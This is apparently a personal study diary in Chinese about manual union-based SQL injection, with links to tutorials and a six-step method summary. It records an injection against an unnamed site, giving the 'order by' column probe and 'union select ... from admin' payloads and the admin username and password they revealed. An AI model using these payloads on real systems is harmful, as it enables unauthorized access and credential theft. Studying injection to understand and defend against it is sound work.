十一月八日 晴朗。
先放一个名词:联合查询
https://www.2cto.com/database/201803/733883.html
https://www.cnblogs.com/caofangsheng/p/5118173.html
这两篇博客都解释的挺清楚的。感觉一定要自己动手做一遍才能记住,现在只是理解,还不够。----
下面记一次神奇的SQL注入破解:
step1:
在链接后加上 order by 11 ------------------->页面显示正常
改成 order by 12 ---------------------->页面报错
===========》说明此站字段长度为11
二、爆管理员用户名及密码
step 1:
在链接后面加上 union select 1,2,3,4,5,6,7,8,9,10,11 from admin
页面显示数字 2 ,3 =========》说明可以爆出管理员的用户名和密码
step2:
链接后改成union select 1,admin,password,4,5,6,7,8,9,10,11 from admin
于是,可以看到用户名admin和密码bfpms
虽然爆出来了,但我还是很好奇为啥能爆出来=。=
★ 手工联合查询注入技术
https://baijiahao.baidu.com/s?id=1605549994392043314&wfr=spider&for=pc
https://www.cnblogs.com/GHost-Ma/p/5502896.html
这两个博客讲的都不错,从写工具的角度去考量整个SQL注入也是个新的学习角度。是该补补python基础了T-T。
总结一下这些博客总的的手工注入的流程:
step1:
判断是数字型还是字符型注入
step2:
判断查询列数
step3:
判断显示位
step4:
获取数据库所有表名
step5:
获取数据库、表中字段名
step6:
获取字段数据